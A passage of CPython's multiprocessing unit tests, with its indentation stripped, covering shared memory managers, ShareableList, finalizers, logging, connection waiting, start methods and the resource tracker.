# test that the custom signal handler registered in the Manager does
# not affect signal handling in the parent process.
with self.assertRaises(KeyboardInterrupt):
os.kill(os.getpid(), signal.SIGINT)
smm.shutdown()
@unittest.skipIf(os.name != "posix", "resource_tracker is posix only")
def test_shared_memory_SharedMemoryManager_reuses_resource_tracker(self):
# bpo-36867: test that a SharedMemoryManager uses the
# same resource_tracker process as its parent.
cmd = '''if 1:
from multiprocessing.managers import SharedMemoryManager
smm = SharedMemoryManager()
smm.start()
sl = smm.ShareableList(range(10))
smm.shutdown()
'''
rc, out, err = test.support.script_helper.assert_python_ok('-c', cmd)
# Before bpo-36867 was fixed, a SharedMemoryManager not using the same
# resource_tracker process as its parent would make the parent's
# tracker complain about sl being leaked even though smm.shutdown()
# properly released sl.
self.assertFalse(err)
def test_shared_memory_SharedMemoryManager_basics(self):
smm1 = multiprocessing.managers.SharedMemoryManager()
with self.assertRaises(ValueError):
smm1.SharedMemory(size=9) # Fails if SharedMemoryServer not started
smm1.start()
lol = [ smm1.ShareableList(range(i)) for i in range(5, 10) ]
lom = [ smm1.SharedMemory(size=j) for j in range(32, 128, 16) ]
doppleganger_list0 = shared_memory.ShareableList(name=lol[0].shm.name)
self.assertEqual(len(doppleganger_list0), 5)
doppleganger_shm0 = shared_memory.SharedMemory(name=lom[0].name)
self.assertGreaterEqual(len(doppleganger_shm0.buf), 32)
held_name = lom[0].name
smm1.shutdown()
if sys.platform != "win32":
# Calls to unlink() have no effect on Windows platform; shared
# memory will only be released once final process exits.
with self.assertRaises(FileNotFoundError):
# No longer there to be attached to again.
absent_shm = shared_memory.SharedMemory(name=held_name)
with multiprocessing.managers.SharedMemoryManager() as smm2:
sl = smm2.ShareableList("howdy")
shm = smm2.SharedMemory(size=128)
held_name = sl.shm.name
if sys.platform != "win32":
with self.assertRaises(FileNotFoundError):
# No longer there to be attached to again.
absent_sl = shared_memory.ShareableList(name=held_name)
def test_shared_memory_ShareableList_basics(self):
sl = shared_memory.ShareableList(
['howdy', b'HoWdY', -273.154, 100, None, True, 42]
)
self.addCleanup(sl.shm.unlink)
# Verify attributes are readable.
self.assertEqual(sl.format, '8s8sdqxxxxxx?xxxxxxxx?q')
# Exercise len().
self.assertEqual(len(sl), 7)
# Exercise index().
with warnings.catch_warnings():
# Suppress BytesWarning when comparing against b'HoWdY'.
warnings.simplefilter('ignore')
with self.assertRaises(ValueError):
sl.index('100')
self.assertEqual(sl.index(100), 3)
# Exercise retrieving individual values.
self.assertEqual(sl[0], 'howdy')
self.assertEqual(sl[-2], True)
# Exercise iterability.
self.assertEqual(
tuple(sl),
('howdy', b'HoWdY', -273.154, 100, None, True, 42)
)
# Exercise modifying individual values.
sl[3] = 42
self.assertEqual(sl[3], 42)
sl[4] = 'some' # Change type at a given position.
self.assertEqual(sl[4], 'some')
self.assertEqual(sl.format, '8s8sdq8sxxxxxxx?q')
with self.assertRaisesRegex(ValueError,
"exceeds available storage"):
sl[4] = 'far too many'
self.assertEqual(sl[4], 'some')
sl[0] = 'encodés' # Exactly 8 bytes of UTF-8 data
self.assertEqual(sl[0], 'encodés')
self.assertEqual(sl[1], b'HoWdY') # no spillage
with self.assertRaisesRegex(ValueError,
"exceeds available storage"):
sl[0] = 'encodées' # Exactly 9 bytes of UTF-8 data
self.assertEqual(sl[1], b'HoWdY')
with self.assertRaisesRegex(ValueError,
"exceeds available storage"):
sl[1] = b'123456789'
self.assertEqual(sl[1], b'HoWdY')
# Exercise count().
with warnings.catch_warnings():
# Suppress BytesWarning when comparing against b'HoWdY'.
warnings.simplefilter('ignore')
self.assertEqual(sl.count(42), 2)
self.assertEqual(sl.count(b'HoWdY'), 1)
self.assertEqual(sl.count(b'adios'), 0)
# Exercise creating a duplicate.
sl_copy = shared_memory.ShareableList(sl, name='test03_duplicate')
try:
self.assertNotEqual(sl.shm.name, sl_copy.shm.name)
self.assertEqual('test03_duplicate', sl_copy.shm.name)
self.assertEqual(list(sl), list(sl_copy))
self.assertEqual(sl.format, sl_copy.format)
sl_copy[-1] = 77
self.assertEqual(sl_copy[-1], 77)
self.assertNotEqual(sl[-1], 77)
sl_copy.shm.close()
finally:
sl_copy.shm.unlink()
# Obtain a second handle on the same ShareableList.
sl_tethered = shared_memory.ShareableList(name=sl.shm.name)
self.assertEqual(sl.shm.name, sl_tethered.shm.name)
sl_tethered[-1] = 880
self.assertEqual(sl[-1], 880)
sl_tethered.shm.close()
sl.shm.close()
# Exercise creating an empty ShareableList.
empty_sl = shared_memory.ShareableList()
try:
self.assertEqual(len(empty_sl), 0)
self.assertEqual(empty_sl.format, '')
self.assertEqual(empty_sl.count('any'), 0)
with self.assertRaises(ValueError):
empty_sl.index(None)
empty_sl.shm.close()
finally:
empty_sl.shm.unlink()
def test_shared_memory_ShareableList_pickling(self):
sl = shared_memory.ShareableList(range(10))
self.addCleanup(sl.shm.unlink)
serialized_sl = pickle.dumps(sl)
deserialized_sl = pickle.loads(serialized_sl)
self.assertTrue(
isinstance(deserialized_sl, shared_memory.ShareableList)
)
self.assertTrue(deserialized_sl[-1], 9)
self.assertFalse(sl is deserialized_sl)
deserialized_sl[4] = "changed"
self.assertEqual(sl[4], "changed")
# Verify data is not being put into the pickled representation.
name = 'a' * len(sl.shm.name)
larger_sl = shared_memory.ShareableList(range(400))
self.addCleanup(larger_sl.shm.unlink)
serialized_larger_sl = pickle.dumps(larger_sl)
self.assertTrue(len(serialized_sl) == len(serialized_larger_sl))
larger_sl.shm.close()
deserialized_sl.shm.close()
sl.shm.close()
def test_shared_memory_cleaned_after_process_termination(self):
cmd = '''if 1:
import os, time, sys
from multiprocessing import shared_memory
# Create a shared_memory segment, and send the segment name
sm = shared_memory.SharedMemory(create=True, size=10)
sys.stdout.write(sm.name + '\\n')
sys.stdout.flush()
time.sleep(100)
'''
with subprocess.Popen([sys.executable, '-E', '-c', cmd],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as p:
name = p.stdout.readline().strip().decode()
# killing abruptly processes holding reference to a shared memory
# segment should not leak the given memory segment.
p.terminate()
p.wait()
deadline = time.monotonic() + support.LONG_TIMEOUT
t = 0.1
while time.monotonic() < deadline:
time.sleep(t)
t = min(t*2, 5)
try:
smm = shared_memory.SharedMemory(name, create=False)
except FileNotFoundError:
break
else:
raise AssertionError("A SharedMemory segment was leaked after"
" a process was abruptly terminated.")
if os.name == 'posix':
# A warning was emitted by the subprocess' own
# resource_tracker (on Windows, shared memory segments
# are released automatically by the OS).
err = p.stderr.read().decode()
self.assertIn(
"resource_tracker: There appear to be 1 leaked "
"shared_memory objects to clean up at shutdown", err)
#
#
#
class _TestFinalize(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
self.registry_backup = util._finalizer_registry.copy()
util._finalizer_registry.clear()
def tearDown(self):
self.assertFalse(util._finalizer_registry)
util._finalizer_registry.update(self.registry_backup)
@classmethod
def _test_finalize(cls, conn):
class Foo(object):
pass
a = Foo()
util.Finalize(a, conn.send, args=('a',))
del a # triggers callback for a
b = Foo()
close_b = util.Finalize(b, conn.send, args=('b',))
close_b() # triggers callback for b
close_b() # does nothing because callback has already been called
del b # does nothing because callback has already been called
c = Foo()
util.Finalize(c, conn.send, args=('c',))
d10 = Foo()
util.Finalize(d10, conn.send, args=('d10',), exitpriority=1)
d01 = Foo()
util.Finalize(d01, conn.send, args=('d01',), exitpriority=0)
d02 = Foo()
util.Finalize(d02, conn.send, args=('d02',), exitpriority=0)
d03 = Foo()
util.Finalize(d03, conn.send, args=('d03',), exitpriority=0)
util.Finalize(None, conn.send, args=('e',), exitpriority=-10)
util.Finalize(None, conn.send, args=('STOP',), exitpriority=-100)
# call multiprocessing's cleanup function then exit process without
# garbage collecting locals
util._exit_function()
conn.close()
os._exit(0)
def test_finalize(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._test_finalize, args=(child_conn,))
p.daemon = True
p.start()
p.join()
result = [obj for obj in iter(conn.recv, 'STOP')]
self.assertEqual(result, ['a', 'b', 'd10', 'd03', 'd02', 'd01', 'e'])
def test_thread_safety(self):
# bpo-24484: _run_finalizers() should be thread-safe
def cb():
pass
class Foo(object):
def __init__(self):
self.ref = self # create reference cycle
# insert finalizer at random key
util.Finalize(self, cb, exitpriority=random.randint(1, 100))
finish = False
exc = None
def run_finalizers():
nonlocal exc
while not finish:
time.sleep(random.random() * 1e-1)
try:
# A GC run will eventually happen during this,
# collecting stale Foo's and mutating the registry
util._run_finalizers()
except Exception as e:
exc = e
def make_finalizers():
nonlocal exc
d = {}
while not finish:
try:
# Old Foo's get gradually replaced and later
# collected by the GC (because of the cyclic ref)
d[random.getrandbits(5)] = {Foo() for i in range(10)}
except Exception as e:
exc = e
d.clear()
old_interval = sys.getswitchinterval()
old_threshold = gc.get_threshold()
try:
sys.setswitchinterval(1e-6)
gc.set_threshold(5, 5, 5)
threads = [threading.Thread(target=run_finalizers),
threading.Thread(target=make_finalizers)]
with test.support.start_threads(threads):
time.sleep(4.0) # Wait a bit to trigger race condition
finish = True
if exc is not None:
raise exc
finally:
sys.setswitchinterval(old_interval)
gc.set_threshold(*old_threshold)
gc.collect() # Collect remaining Foo's
#
# Test that from ... import * works for each module
#
class _TestImportStar(unittest.TestCase):
def get_module_names(self):
import glob
folder = os.path.dirname(multiprocessing.__file__)
pattern = os.path.join(glob.escape(folder), '*.py')
files = glob.glob(pattern)
modules = [os.path.splitext(os.path.split(f)[1])[0] for f in files]
modules = ['multiprocessing.' + m for m in modules]
modules.remove('multiprocessing.__init__')
modules.append('multiprocessing')
return modules
def test_import(self):
modules = self.get_module_names()
if sys.platform == 'win32':
modules.remove('multiprocessing.popen_fork')
modules.remove('multiprocessing.popen_forkserver')
modules.remove('multiprocessing.popen_spawn_posix')
else:
modules.remove('multiprocessing.popen_spawn_win32')
if not HAS_REDUCTION:
modules.remove('multiprocessing.popen_forkserver')
if c_int is None:
# This module requires _ctypes
modules.remove('multiprocessing.sharedctypes')
for name in modules:
__import__(name)
mod = sys.modules[name]
self.assertTrue(hasattr(mod, '__all__'), name)
for attr in mod.__all__:
self.assertTrue(
hasattr(mod, attr),
'%r does not have attribute %r' % (mod, attr)
)
#
# Quick test that logging works -- does not test logging output
#
class _TestLogging(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_enable_logging(self):
logger = multiprocessing.get_logger()
logger.setLevel(util.SUBWARNING)
self.assertTrue(logger is not None)
logger.debug('this will not be printed')
logger.info('nor will this')
logger.setLevel(LOG_LEVEL)
@classmethod
def _test_level(cls, conn):
logger = multiprocessing.get_logger()
conn.send(logger.getEffectiveLevel())
def test_level(self):
LEVEL1 = 32
LEVEL2 = 37
logger = multiprocessing.get_logger()
root_logger = logging.getLogger()
root_level = root_logger.level
reader, writer = multiprocessing.Pipe(duplex=False)
logger.setLevel(LEVEL1)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL1, reader.recv())
p.join()
p.close()
logger.setLevel(logging.NOTSET)
root_logger.setLevel(LEVEL2)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL2, reader.recv())
p.join()
p.close()
root_logger.setLevel(root_level)
logger.setLevel(level=LOG_LEVEL)
# class _TestLoggingProcessName(BaseTestCase):
#
# def handle(self, record):
# assert record.processName == multiprocessing.current_process().name
# self.__handled = True
#
# def test_logging(self):
# handler = logging.Handler()
# handler.handle = self.handle
# self.__handled = False
# # Bypass getLogger() and side-effects
# logger = logging.getLoggerClass()(
# 'multiprocessing.test.TestLoggingProcessName')
# logger.addHandler(handler)
# logger.propagate = False
#
# logger.warn('foo')
# assert self.__handled
#
# Check that Process.join() retries if os.waitpid() fails with EINTR
#
class _TestPollEintr(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def _killer(cls, pid):
time.sleep(0.1)
os.kill(pid, signal.SIGUSR1)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_poll_eintr(self):
got_signal = [False]
def record(*args):
got_signal[0] = True
pid = os.getpid()
oldhandler = signal.signal(signal.SIGUSR1, record)
try:
killer = self.Process(target=self._killer, args=(pid,))
killer.start()
try:
p = self.Process(target=time.sleep, args=(2,))
p.start()
p.join()
finally:
killer.join()
self.assertTrue(got_signal[0])
self.assertEqual(p.exitcode, 0)
finally:
signal.signal(signal.SIGUSR1, oldhandler)
#
# Test to verify handle verification, see issue 3321
#
class TestInvalidHandle(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_handles(self):
conn = multiprocessing.connection.Connection(44977608)
# check that poll() doesn't crash
try:
conn.poll()
except (ValueError, OSError):
pass
finally:
# Hack private attribute _handle to avoid printing an error
# in conn.__del__
conn._handle = None
self.assertRaises((ValueError, OSError),
multiprocessing.connection.Connection, -1)
@hashlib_helper.requires_hashdigest('md5')
class OtherTest(unittest.TestCase):
# TODO: add more tests for deliver/answer challenge.
def test_deliver_challenge_auth_failure(self):
class _FakeConnection(object):
def recv_bytes(self, size):
return b'something bogus'
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.deliver_challenge,
_FakeConnection(), b'abc')
def test_answer_challenge_auth_failure(self):
class _FakeConnection(object):
def __init__(self):
self.count = 0
def recv_bytes(self, size):
self.count += 1
if self.count == 1:
return multiprocessing.connection.CHALLENGE
elif self.count == 2:
return b'something bogus'
return b''
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.answer_challenge,
_FakeConnection(), b'abc')
#
# Test Manager.start()/Pool.__init__() initializer feature - see issue 5585
#
def initializer(ns):
ns.test += 1
@hashlib_helper.requires_hashdigest('md5')
class TestInitializers(unittest.TestCase):
def setUp(self):
self.mgr = multiprocessing.Manager()
self.ns = self.mgr.Namespace()
self.ns.test = 0
def tearDown(self):
self.mgr.shutdown()
self.mgr.join()
def test_manager_initializer(self):
m = multiprocessing.managers.SyncManager()
self.assertRaises(TypeError, m.start, 1)
m.start(initializer, (self.ns,))
self.assertEqual(self.ns.test, 1)
m.shutdown()
m.join()
def test_pool_initializer(self):
self.assertRaises(TypeError, multiprocessing.Pool, initializer=1)
p = multiprocessing.Pool(1, initializer, (self.ns,))
p.close()
p.join()
self.assertEqual(self.ns.test, 1)
#
# Issue 5155, 5313, 5331: Test process in processes
# Verifies os.close(sys.stdin.fileno) vs. sys.stdin.close() behavior
#
def _this_sub_process(q):
try:
item = q.get(block=False)
except pyqueue.Empty:
pass
def _test_process():
queue = multiprocessing.Queue()
subProc = multiprocessing.Process(target=_this_sub_process, args=(queue,))
subProc.daemon = True
subProc.start()
subProc.join()
def _afunc(x):
return x*x
def pool_in_process():
pool = multiprocessing.Pool(processes=4)
x = pool.map(_afunc, [1, 2, 3, 4, 5, 6, 7])
pool.close()
pool.join()
class _file_like(object):
def __init__(self, delegate):
self._delegate = delegate
self._pid = None
@property
def cache(self):
pid = os.getpid()
# There are no race conditions since fork keeps only the running thread
if pid != self._pid:
self._pid = pid
self._cache = []
return self._cache
def write(self, data):
self.cache.append(data)
def flush(self):
self._delegate.write(''.join(self.cache))
self._cache = []
class TestStdinBadfiledescriptor(unittest.TestCase):
def test_queue_in_process(self):
proc = multiprocessing.Process(target=_test_process)
proc.start()
proc.join()
def test_pool_in_process(self):
p = multiprocessing.Process(target=pool_in_process)
p.start()
p.join()
def test_flushing(self):
sio = io.StringIO()
flike = _file_like(sio)
flike.write('foo')
proc = multiprocessing.Process(target=lambda: flike.flush())
flike.flush()
assert sio.getvalue() == 'foo'
class TestWait(unittest.TestCase):
@classmethod
def _child_test_wait(cls, w, slow):
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
w.send((i, os.getpid()))
w.close()
def test_wait(self, slow=False):
from multiprocessing.connection import wait
readers = []
procs = []
messages = []
for i in range(4):
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=self._child_test_wait, args=(w, slow))
p.daemon = True
p.start()
w.close()
readers.append(r)
procs.append(p)
self.addCleanup(p.join)
while readers:
for r in wait(readers):
try:
msg = r.recv()
except EOFError:
readers.remove(r)
r.close()
else:
messages.append(msg)
messages.sort()
expected = sorted((i, p.pid) for i in range(10) for p in procs)
self.assertEqual(messages, expected)
@classmethod
def _child_test_wait_socket(cls, address, slow):
s = socket.socket()
s.connect(address)
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
s.sendall(('%s\n' % i).encode('ascii'))
s.close()
def test_wait_socket(self, slow=False):
from multiprocessing.connection import wait
l = socket.create_server((socket_helper.HOST, 0))
addr = l.getsockname()
readers = []
procs = []
dic = {}
for i in range(4):
p = multiprocessing.Process(target=self._child_test_wait_socket,
args=(addr, slow))
p.daemon = True
p.start()
procs.append(p)
self.addCleanup(p.join)
for i in range(4):
r, _ = l.accept()
readers.append(r)
dic[r] = []
l.close()
while readers:
for r in wait(readers):
msg = r.recv(32)
if not msg:
readers.remove(r)
r.close()
else:
dic[r].append(msg)
expected = ''.join('%s\n' % i for i in range(10)).encode('ascii')
for v in dic.values():
self.assertEqual(b''.join(v), expected)
def test_wait_slow(self):
self.test_wait(True)
def test_wait_socket_slow(self):
self.test_wait_socket(True)
def test_wait_timeout(self):
from multiprocessing.connection import wait
expected = 5
a, b = multiprocessing.Pipe()
start = time.monotonic()
res = wait([a, b], expected)
delta = time.monotonic() - start
self.assertEqual(res, [])
self.assertLess(delta, expected * 2)
self.assertGreater(delta, expected * 0.5)
b.send(None)
start = time.monotonic()
res = wait([a, b], 20)
delta = time.monotonic() - start
self.assertEqual(res, [a])
self.assertLess(delta, 0.4)
@classmethod
def signal_and_sleep(cls, sem, period):
sem.release()
time.sleep(period)
def test_wait_integer(self):
from multiprocessing.connection import wait
expected = 3
sorted_ = lambda l: sorted(l, key=lambda x: id(x))
sem = multiprocessing.Semaphore(0)
a, b = multiprocessing.Pipe()
p = multiprocessing.Process(target=self.signal_and_sleep,
args=(sem, expected))
p.start()
self.assertIsInstance(p.sentinel, int)
self.assertTrue(sem.acquire(timeout=20))
start = time.monotonic()
res = wait([a, p.sentinel, b], expected + 20)
delta = time.monotonic() - start
self.assertEqual(res, [p.sentinel])
self.assertLess(delta, expected + 2)
self.assertGreater(delta, expected - 2)
a.send(None)
start = time.monotonic()
res = wait([a, p.sentinel, b], 20)
delta = time.monotonic() - start
self.assertEqual(sorted_(res), sorted_([p.sentinel, b]))
self.assertLess(delta, 0.4)
b.send(None)
start = time.monotonic()
res = wait([a, p.sentinel, b], 20)
delta = time.monotonic() - start
self.assertEqual(sorted_(res), sorted_([a, p.sentinel, b]))
self.assertLess(delta, 0.4)
p.terminate()
p.join()
def test_neg_timeout(self):
from multiprocessing.connection import wait
a, b = multiprocessing.Pipe()
t = time.monotonic()
res = wait([a], timeout=-1)
t = time.monotonic() - t
self.assertEqual(res, [])
self.assertLess(t, 1)
a.close()
b.close()
#
# Issue 14151: Test invalid family on invalid environment
#
class TestInvalidFamily(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_family(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener(r'\\.\test')
@unittest.skipUnless(WIN32, "skipped on non-Windows platforms")
def test_invalid_family_win32(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener('/var/test.pipe')
#
# Issue 12098: check sys.flags of child matches that for parent
#
class TestFlags(unittest.TestCase):
@classmethod
def run_in_grandchild(cls, conn):
conn.send(tuple(sys.flags))
@classmethod
def run_in_child(cls):
import json
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=cls.run_in_grandchild, args=(w,))
p.start()
grandchild_flags = r.recv()
p.join()
r.close()
w.close()
flags = (tuple(sys.flags), grandchild_flags)
print(json.dumps(flags))
def test_flags(self):
import json
# start child process using unusual flags
prog = ('from test._test_multiprocessing import TestFlags; ' +
'TestFlags.run_in_child()')
data = subprocess.check_output(
[sys.executable, '-E', '-S', '-O', '-c', prog])
child_flags, grandchild_flags = json.loads(data.decode('ascii'))
self.assertEqual(child_flags, grandchild_flags)
#
# Test interaction with socket timeouts - see Issue #6056
#
class TestTimeouts(unittest.TestCase):
@classmethod
def _test_timeout(cls, child, address):
time.sleep(1)
child.send(123)
child.close()
conn = multiprocessing.connection.Client(address)
conn.send(456)
conn.close()
def test_timeout(self):
old_timeout = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(0.1)
parent, child = multiprocessing.Pipe(duplex=True)
l = multiprocessing.connection.Listener(family='AF_INET')
p = multiprocessing.Process(target=self._test_timeout,
args=(child, l.address))
p.start()
child.close()
self.assertEqual(parent.recv(), 123)
parent.close()
conn = l.accept()
self.assertEqual(conn.recv(), 456)
conn.close()
l.close()
join_process(p)
finally:
socket.setdefaulttimeout(old_timeout)
#
# Test what happens with no "if __name__ == '__main__'"
#
class TestNoForkBomb(unittest.TestCase):
def test_noforkbomb(self):
sm = multiprocessing.get_start_method()
name = os.path.join(os.path.dirname(__file__), 'mp_fork_bomb.py')
if sm != 'fork':
rc, out, err = test.support.script_helper.assert_python_failure(name, sm)
self.assertEqual(out, b'')
self.assertIn(b'RuntimeError', err)
else:
rc, out, err = test.support.script_helper.assert_python_ok(name, sm)
self.assertEqual(out.rstrip(), b'123')
self.assertEqual(err, b'')
#
# Issue #17555: ForkAwareThreadLock
#
class TestForkAwareThreadLock(unittest.TestCase):
# We recursively start processes. Issue #17555 meant that the
# after fork registry would get duplicate entries for the same
# lock. The size of the registry at generation n was ~2**n.
@classmethod
def child(cls, n, conn):
if n > 1:
p = multiprocessing.Process(target=cls.child, args=(n-1, conn))
p.start()
conn.close()
join_process(p)
else:
conn.send(len(util._afterfork_registry))
conn.close()
def test_lock(self):
r, w = multiprocessing.Pipe(False)
l = util.ForkAwareThreadLock()
old_size = len(util._afterfork_registry)
p = multiprocessing.Process(target=self.child, args=(5, w))
p.start()
w.close()
new_size = r.recv()
join_process(p)
self.assertLessEqual(new_size, old_size)
#
# Check that non-forked child processes do not inherit unneeded fds/handles
#
class TestCloseFds(unittest.TestCase):
def get_high_socket_fd(self):
if WIN32:
# The child process will not have any socket handles, so
# calling socket.fromfd() should produce WSAENOTSOCK even
# if there is a handle of the same number.
return socket.socket().detach()
else:
# We want to produce a socket with an fd high enough that a
# freshly created child process will not have any fds as high.
fd = socket.socket().detach()
to_close = []
while fd < 50:
to_close.append(fd)
fd = os.dup(fd)
for x in to_close:
os.close(x)
return fd
def close(self, fd):
if WIN32:
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=fd).close()
else:
os.close(fd)
@classmethod
def _test_closefds(cls, conn, fd):
try:
s = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
except Exception as e:
conn.send(e)
else:
s.close()
conn.send(None)
def test_closefd(self):
if not HAS_REDUCTION:
raise unittest.SkipTest('requires fd pickling')
reader, writer = multiprocessing.Pipe()
fd = self.get_high_socket_fd()
try:
p = multiprocessing.Process(target=self._test_closefds,
args=(writer, fd))
p.start()
writer.close()
e = reader.recv()
join_process(p)
finally:
self.close(fd)
writer.close()
reader.close()
if multiprocessing.get_start_method() == 'fork':
self.assertIs(e, None)
else:
WSAENOTSOCK = 10038
self.assertIsInstance(e, OSError)
self.assertTrue(e.errno == errno.EBADF or
e.winerror == WSAENOTSOCK, e)
#
# Issue #17097: EINTR should be ignored by recv(), send(), accept() etc
#
class TestIgnoreEINTR(unittest.TestCase):
# Sending CONN_MAX_SIZE bytes into a multiprocessing pipe must block
CONN_MAX_SIZE = max(support.PIPE_MAX_SIZE, support.SOCK_MAX_SIZE)
@classmethod
def _test_ignore(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
conn.send('ready')
x = conn.recv()
conn.send(x)
conn.send_bytes(b'x' * cls.CONN_MAX_SIZE)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
self.assertEqual(conn.recv(), 'ready')
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
conn.send(1234)
self.assertEqual(conn.recv(), 1234)
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
self.assertEqual(conn.recv_bytes(), b'x' * self.CONN_MAX_SIZE)
time.sleep(0.1)
p.join()
finally:
conn.close()
@classmethod
def _test_ignore_listener(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
with multiprocessing.connection.Listener() as l:
conn.send(l.address)
a = l.accept()
a.send('welcome')
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore_listener(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore_listener,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
address = conn.recv()
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
client = multiprocessing.connection.Client(address)
self.assertEqual(client.recv(), 'welcome')
p.join()
finally:
conn.close()
class TestStartMethod(unittest.TestCase):
@classmethod
def _check_context(cls, conn):
conn.send(multiprocessing.get_start_method())
def check_context(self, ctx):
r, w = ctx.Pipe(duplex=False)
p = ctx.Process(target=self._check_context, args=(w,))
p.start()
w.close()
child_method = r.recv()
r.close()
p.join()
self.assertEqual(child_method, ctx.get_start_method())
def test_context(self):
for method in ('fork', 'spawn', 'forkserver'):
try:
ctx = multiprocessing.get_context(method)
except ValueError:
continue
self.assertEqual(ctx.get_start_method(), method)
self.assertIs(ctx.get_context(), ctx)
self.assertRaises(ValueError, ctx.set_start_method, 'spawn')
self.assertRaises(ValueError, ctx.set_start_method, None)
self.check_context(ctx)
def test_set_get(self):
multiprocessing.set_forkserver_preload(PRELOAD)
count = 0
old_method = multiprocessing.get_start_method()
try:
for method in ('fork', 'spawn', 'forkserver'):
try:
multiprocessing.set_start_method(method, force=True)
except ValueError:
continue
self.assertEqual(multiprocessing.get_start_method(), method)
ctx = multiprocessing.get_context()
self.assertEqual(ctx.get_start_method(), method)
self.assertTrue(type(ctx).__name__.lower().startswith(method))
self.assertTrue(
ctx.Process.__name__.lower().startswith(method))
self.check_context(multiprocessing)
count += 1
finally:
multiprocessing.set_start_method(old_method, force=True)
self.assertGreaterEqual(count, 1)
def test_get_all(self):
methods = multiprocessing.get_all_start_methods()
if sys.platform == 'win32':
self.assertEqual(methods, ['spawn'])
else:
self.assertTrue(methods == ['fork', 'spawn'] or
methods == ['spawn', 'fork'] or
methods == ['fork', 'spawn', 'forkserver'] or
methods == ['spawn', 'fork', 'forkserver'])
def test_preload_resources(self):
if multiprocessing.get_start_method() != 'forkserver':
self.skipTest("test only relevant for 'forkserver' method")
name = os.path.join(os.path.dirname(__file__), 'mp_preload.py')
rc, out, err = test.support.script_helper.assert_python_ok(name)
out = out.decode()
err = err.decode()
if out.rstrip() != 'ok' or err != '':
print(out)
print(err)
self.fail("failed spawning forkserver or grandchild")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
class TestResourceTracker(unittest.TestCase):
def test_resource_tracker(self):
#
# Check that killing process does not leak named semaphores
#
cmd = '''if 1:
import time, os, tempfile
import multiprocessing as mp
from multiprocessing import resource_tracker
from multiprocessing.shared_memory import SharedMemory
mp.set_start_method("spawn")
rand = tempfile._RandomNameSequence()
def create_and_register_resource(rtype):
if rtype == "semaphore":
lock = mp.Lock()
return lock, lock._semlock.name
elif rtype == "shared_memory":
sm = SharedMemory(create=True, size=10)
return sm, sm._name
else:
raise ValueError(
"Resource type {{}} not understood".format(rtype))
resource1, rname1 = create_and_register_resource("{rtype}")
resource2, rname2 = create_and_register_resource("{rtype}")
os.write({w}, rname1.encode("ascii") + b"\\n")
os.write({w}, rname2.encode("ascii") + b"\\n")
time.sleep(10)
'''
for rtype in resource_tracker._CLEANUP_FUNCS:
with self.subTest(rtype=rtype):
if rtype == "noop":
# Artefact resource type used by the resource_tracker
continue
r, w = os.pipe()
p = subprocess.Popen([sys.executable,
'-E', '-c', cmd.format(w=w, rtype=rtype)],
pass_fds=[w],
stderr=subprocess.PIPE)
os.close(w)
with open(r, 'rb', closefd=True) as f:
name1 = f.readline().rstrip().decode('ascii')
name2 = f.readline().rstrip().decode('ascii')
_resource_unlink(name1, rtype)
p.terminate()
p.wait()
deadline = time.monotonic() + support.LONG_TIMEOUT
while time.monotonic() < deadline:
time.sleep(.5)
try:
_resource_unlink(name2, rtype)
except OSError as e:
# docs say it should be ENOENT, but OSX seems to give
# EINVAL
self.assertIn(e.errno, (errno.ENOENT, errno.EINVAL))
break
else:
raise AssertionError(
f"A {rtype} resource was leaked after a process was "
f"abruptly terminated.")
err = p.stderr.read().decode('utf-8')
p.stderr.close()
expected = ('resource_tracker: There appear to be 2 leaked {} '
'objects'.format(
rtype))
self.assertRegex(err, expected)
self.assertRegex(err, r'resource_tracker: %r: \[Errno' % name1)
def check_resource_tracker_death(self, signum, should_die):
# bpo-31310: if the semaphore tracker process has died, it should
# be restarted implicitly.
from multiprocessing.resource_tracker import _resource_tracker
pid = _resource_tracker._pid
if pid is not None:
os.kill(pid, signal.SIGKILL)
support.wait_process(pid, exitcode=-signal.SIGKILL)
with warnings.catch_warnings():
warnings.simplefilter("ignore")
_resource_tracker.ensure_running()
pid = _resource_tracker._pid
os.kill(pid, signum)
time.sleep(1.0) # give it time to die
ctx = multiprocessing.get_context("spawn")
with warnings.catch_warnings(record=True) as all_warn:
warnings.simplefilter("always")
sem = ctx.Semaphore()
sem.acquire()
sem.release()
wr = weakref.ref(sem)
# ensure `sem` gets collected, which triggers communication with
# the semaphore tracker
del sem
